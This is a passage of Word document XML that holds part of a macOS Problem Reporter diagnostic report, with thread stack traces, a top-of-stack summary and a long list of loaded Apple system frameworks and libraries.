    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    2670 Thread_3795887</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    + 2670 start_wqthread  (in libsystem_pthread.dylib) + 13  [0x7fffd1d8c211]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +   2670 _pthread_wqthread  (in libsystem_pthread.dylib) + 1023  [0x7fffd1d8c622]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +     2670 __workq_kernreturn  (in libsystem_kernel.dylib) + 10  [0x7fffd1ca44e6]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    2670 Thread_3795891: com.apple.NSEventThread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">      2670 thread_start  (in libsystem_pthread.dylib) + 13  [0x7fffd1d8c221]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">        2670 _pthread_start  (in libsystem_pthread.dylib) + 286  [0x7fffd1d8c9f7]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">          2670 _pthread_body  (in libsystem_pthread.dylib) + 180  [0x7fffd1d8caab]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">            2670 _NSEventThread  (in AppKit) + 205  [0x7fffba87e5a0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">              2670 CFRunLoopRunSpecific  (in CoreFoundation) + 420  [0x7fffbcaaa514]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">                2670 __CFRunLoopRun  (in CoreFoundation) + 1361  [0x7fffbcaaacc1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">                  2670 __CFRunLoopServiceMachPort  (in CoreFoundation) + 212  [0x7fffbcaab834]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">                    2670 mach_msg  (in libsystem_kernel.dylib) + 55  [0x7fffd1c9b867]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">                      2670 mach_msg_trap  (in libsystem_kernel.dylib) + 10  [0x7fffd1c9c41a]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4"/>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Total number in stack (recursive counted multiple, when &gt;=5):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4"/>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Sort by top of stack, same collapsed (when &gt;= 5):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">        mach_msg_trap  (in libsystem_kernel.dylib)        5340</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">        __workq_kernreturn  (in libsystem_kernel.dylib)        2670</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4"/>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Binary Images:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">       0x100bc3000 -        0x100bd0ff3  com.apple.ProblemReporter (10.12 - 816) &lt;63C3AF4D-E990-3445-B445-ADE596CEDB5C&gt; /System/Library/CoreServices/Problem Reporter.app/Contents/MacOS/Problem Reporter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">       0x10294d000 -        0x10294fff7  com.apple.Seeding (1.0 - 1) &lt;9C37CE8E-BF4E-3EF6-A066-083A1BF02D09&gt; /System/Library/PrivateFrameworks/Seeding.framework/Seeding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">       0x104967000 -        0x10497effb  libCGInterfaces.dylib (331.5) &lt;5796C169-B449-33C8-B471-BD711BDCB898&gt; /System/Library/Frameworks/Accelerate.framework/Frameworks/vImage.framework/Versions/A/Libraries/libCGInterfaces.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">       0x105e46000 -        0x105e83287  dyld (0.0 - ???) &lt;13A9466A-2576-3ABB-AD9D-D6BC16439B8F&gt; /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">       0x10d0dc000 -        0x10d0fcff7  com.apple.CoreNLP (1.0 - 78) &lt;3D2A949C-DE66-34F4-9A97-9817C8054CC9&gt; /System/Library/PrivateFrameworks/CoreNLP.framework/Versions/A/CoreNLP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffb78bd000 -     0x7fffb7bf5fff  com.apple.RawCamera.bundle (7.00 - 874) &lt;99AF1865-BCDD-3313-85BF-E246745201F0&gt; /System/Library/CoreServices/RawCamera.bundle/Contents/MacOS/RawCamera</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffb941a000 -     0x7fffb95d8ff7  com.apple.avfoundation (2.0 - 1183.4) &lt;CF8F272A-5046-389C-A89F-0C71CF700415&gt; /System/Library/Frameworks/AVFoundation.framework/Versions/A/AVFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffb95d9000 -     0x7fffb967cff7  com.apple.audio.AVFAudio (1.0 - ???) &lt;F340B5A9-80C4-39C2-952A-51F84681103F&gt; /System/Library/Frameworks/AVFoundation.framework/Versions/A/Frameworks/AVFAudio.framework/Versions/A/AVFAudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffb9711000 -     0x7fffb9711fff  com.apple.Accelerate (1.11 - Accelerate 1.11) &lt;97EF9FB3-581F-3F19-84D0-E9262559A454&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffb972a000 -     0x7fffb9c43feb  com.apple.vImage (8.1 - ???) &lt;A5DBF800-F768-3A61-8575-9B45FC32FEAB&gt; </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffb9c44000 -     0x7fffb9db4ff3  libBLAS.dylib (1185) &lt;C7E42BBE-2337-3AEF-9C45-A2F2CB1A5B3E&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffb9db5000 -     0x7fffb9dc9ffb  libBNNS.dylib (14) &lt;CFDEE88D-E002-347C-BC68-83099651585B&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBNNS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffb9dca000 -     0x7fffba1c0fef  libLAPACK.dylib (1185) &lt;2E8201CB-9A41-3D65-853E-841917FCE77B&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffba1c1000 -     0x7fffba1d7fff  libLinearAlgebra.dylib (1185) &lt;8CC29DE1-A231-3D5E-B5F1-DCC309036FE0&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffba1d8000 -     0x7fffba1defff  libQuadrature.dylib (3) &lt;120F6228-A3D4-3184-89D7-785ADC2AC715&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libQuadrature.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffba1df000 -     0x7fffba1f3ff7  libSparseBLAS.dylib (1185) &lt;C35235B7-CFA6-39A7-BD6E-79F4D9CAFD36&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libSparseBLAS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffba1f4000 -     0x7fffba37bfe7  libvDSP.dylib (600) &lt;DF2860D3-1B2E-3DE0-8D8D-F567374398CB&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffba37c000 -     0x7fffba42effb  libvMisc.dylib (600) &lt;5E006F98-FB5C-3AC4-B8B9-6D267B22AA72&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMisc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffba42f000 -     0x7fffba42ffff  com.apple.Accelerate.vecLib (3.11 - vecLib 3.11) &lt;A395B521-8E54-30F2-B4FE-355D68900DAF&gt; /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/vecLib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffba430000 -     0x7fffba470ffb  com.apple.Accounts (113 - 113) &lt;5EB6A20D-5A7C-321D-B3DB-FFE90D834578&gt; /System/Library/Frameworks/Accounts.framework/Versions/A/Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffba471000 -     0x7fffba6eaff3  com.apple.AddressBook.framework (10.0 - 1756.9) &lt;56BAE45E-071C-3F32-8668-37E9E40A593C&gt; /System/Library/Frameworks/AddressBook.framework/Versions/A/AddressBook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffba6eb000 -     0x7fffbb3cbff3  com.apple.AppKit (6.9 - 1504.60) &lt;5DA1E013-575C-34D5-A028-1639EB7B0040&gt; /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb3dd000 -     0x7fffbb3ddfff  com.apple.ApplicationServices (48 - 48) &lt;3E1395EA-C661-3318-9B87-9857BB81021B&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb3de000 -     0x7fffbb44cff7  com.apple.ApplicationServices.ATS (377 - 422.1) &lt;FF4D9FCA-D799-3ED1-B5F8-3D81C29342D0&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/ATS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb4e6000 -     0x7fffbb614ff7  libFontParser.dylib (194.2) &lt;E29F233F-773A-3070-874A-83799BDF0B5D&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontParser.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb615000 -     0x7fffbb65ffff  libFontRegistry.dylib (196.2) &lt;8AEE7F4E-60F0-33BB-99E4-5381EF1FEC6F&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb6bc000 -     0x7fffbb6eefff  libTrueTypeScaler.dylib (194.2) &lt;A8520109-5F65-3144-ABF7-E22B98A74287&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libTrueTypeScaler.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffbb75a000 -     0x7fffbb804ff7  com.apple.ColorSync (4.12.0 - 502) &lt;C86F8032-83DD-34EB-A4CB-87E96F25CF1C&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb805000 -     0x7fffbb855fff  com.apple.HIServices (1.22 - 590) &lt;109A9893-313B-3467-9892-062F49D1FF0D&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb856000 -     0x7fffbb865ff3  com.apple.LangAnalysis (1.7.0 - 1.7.0) &lt;47D1A017-91A4-37F3-93E0-3923CD6ED2DE&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb866000 -     0x7fffbb8b3fff  com.apple.print.framework.PrintCore (12 - 491) &lt;B7CC15C1-AF50-37F3-8AF6-65F8CDC323F0&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb8b4000 -     0x7fffbb8effff  com.apple.QD (3.12 - 310) &lt;8F718290-DD82-36CE-9AF0-EFB6D31A49F4&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/QD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb8f0000 -     0x7fffbb8fbff7  com.apple.speech.synthesis.framework (6.0.15 - 6.0.15) &lt;23EA6076-ECDF-3A50-81E7-3CE6451DC8C4&gt; /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbb8fc000 -     0x7fffbbb0aff7  com.apple.audio.toolbox.AudioToolbox (1.14 - 1.14) &lt;BA73DBAD-A9D2-3BA7-BCDB-4790D6C8B460&gt; /System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbbb0b000 -     0x7fffbbb0bfff  com.apple.audio.units.AudioUnit (1.14 - 1.14) &lt;C49668FF-2971-3E30-92BB-09E0720E74A5&gt; /System/Library/Frameworks/AudioUnit.framework/Versions/A/AudioUnit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbbc74000 -     0x7fffbbff8ff7  com.apple.CFNetwork (807.1.3 - 807.1.3) &lt;336BFAD9-1BAE-368E-8C48-B9F1CC251C67&gt; /System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffbc012000 -     0x7fffbc012fff  com.apple.Carbon (154 - 157) &lt;AB71A31F-5B15-3BF5-8532-591EACD07B21&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Carbon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc013000 -     0x7fffbc016fff  com.apple.CommonPanels (1.2.6 - 98) &lt;DDA2DF0B-86E7-34B6-B688-D7371DBC8A63&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/CommonPanels.framework/Versions/A/CommonPanels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc017000 -     0x7fffbc31bfff  com.apple.HIToolbox (2.1.1 - 856.6) &lt;DAF74CE6-8B6B-3347-B299-FE860B517D38&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc31c000 -     0x7fffbc31fff7  com.apple.help (1.3.5 - 49) &lt;27C5F9FE-838F-3807-A4AC-D99470185B10&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Help.framework/Versions/A/Help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc320000 -     0x7fffbc325fff  com.apple.ImageCapture (9.0 - 9.0) &lt;E3E757FD-4060-33A4-A2AC-85EFBD987FCE&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/ImageCapture.framework/Versions/A/ImageCapture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc326000 -     0x7fffbc3bdff3  com.apple.ink.framework (10.9 - 219) &lt;B44BA36D-7549-3EB2-8CF6-E171885194FB&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Ink.framework/Versions/A/Ink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc3be000 -     0x7fffbc3d8fff  com.apple.openscripting (1.7 - 172) &lt;B204BF70-C4AA-3699-8493-66E6645A92A8&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/OpenScripting.framework/Versions/A/OpenScripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc3d9000 -     0x7fffbc3daff3  com.apple.print.framework.Print (12 - 267) &lt;CA7E9448-0903-34C8-AAF6-9070B52BF70E&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Print.framework/Versions/A/Print</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc3db000 -     0x7fffbc3ddff7  com.apple.securityhi (9.0 - 55006) &lt;FFB3F28C-B982-34EF-8510-8D6D10975404&gt; </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SecurityHI.framework/Versions/A/SecurityHI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc3de000 -     0x7fffbc3e4ff7  com.apple.speech.recognition.framework (6.0.1 - 6.0.1) &lt;A20B0F7B-C32A-3FF1-BB75-BAC0EE4EF889&gt; /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SpeechRecognition.framework/Versions/A/SpeechRecognition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc3e5000 -     0x7fffbc4c3fff  com.apple.cloudkit.CloudKit (639.2.1 - 639.2.1) &lt;9F6CFA9A-3109-30C5-B3AB-4745489E7EBD&gt; /System/Library/Frameworks/CloudKit.framework/Versions/A/CloudKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc4c4000 -     0x7fffbc4c4fff  com.apple.Cocoa (6.11 - 22) &lt;5EEB0A26-F1C2-3D57-8441-52C0B80C2A6A&gt; /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc5fa000 -     0x7fffbc68aff7  com.apple.audio.CoreAudio (4.3.0 - 4.3.0) &lt;4082E8CC-568A-364A-9AF0-92F30F067D42&gt; /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc68b000 -     0x7fffbc69eff3  com.apple.CoreBluetooth (1.0 - 1) &lt;73A2B185-70E4-3535-A653-E1BC74584E55&gt; /System/Library/Frameworks/CoreBluetooth.framework/Versions/A/CoreBluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc69f000 -     0x7fffbc995ffb  com.apple.CoreData (120 - 752.2) &lt;CCDCE896-CD36-3483-8E04-C513433BDDC5&gt; /System/Library/Frameworks/CoreData.framework/Versions/A/CoreData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbc996000 -     0x7fffbca22fff  com.apple.CoreDisplay (1.0 - 1) &lt;ACA3B0B8-6900-3445-B202-C5C312421E44&gt; /System/Library/Frameworks/CoreDisplay.framework/Versions/A/CoreDisplay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbca23000 -     0x7fffbcebcff7  com.apple.CoreFoundation (6.9 - 1348.15) &lt;C25C6FB8-E934-349C-952C-26CF913BAC33&gt; /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbcebd000 -     0x7fffbd53bfff  com.apple.CoreGraphics (2.0 - 1070.8) &lt;3F5B7647-8006-3738-9A5A-1AD2DF570992&gt; /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbd53c000 -     0x7fffbd77bff7  com.apple.CoreImage (12.0.0 - 451) &lt;4A79760F-FD23-3055-9569-5F038818993F&gt; /System/Library/Frameworks/CoreImage.framework/Versions/A/CoreImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffbd77c000 -     0x7fffbd7d8ff7  com.apple.corelocation (2100.3.14.4) &lt;40B8B610-F93C-3708-B61D-E840E5708AC0&gt; /System/Library/Frameworks/CoreLocation.framework/Versions/A/CoreLocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbd7d9000 -     0x7fffbd889ff7  com.apple.CoreMedia (1.0 - 1903.11) &lt;34BC19CF-0203-315F-A75D-1E4237BF3FF4&gt; /System/Library/Frameworks/CoreMedia.framework/Versions/A/CoreMedia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
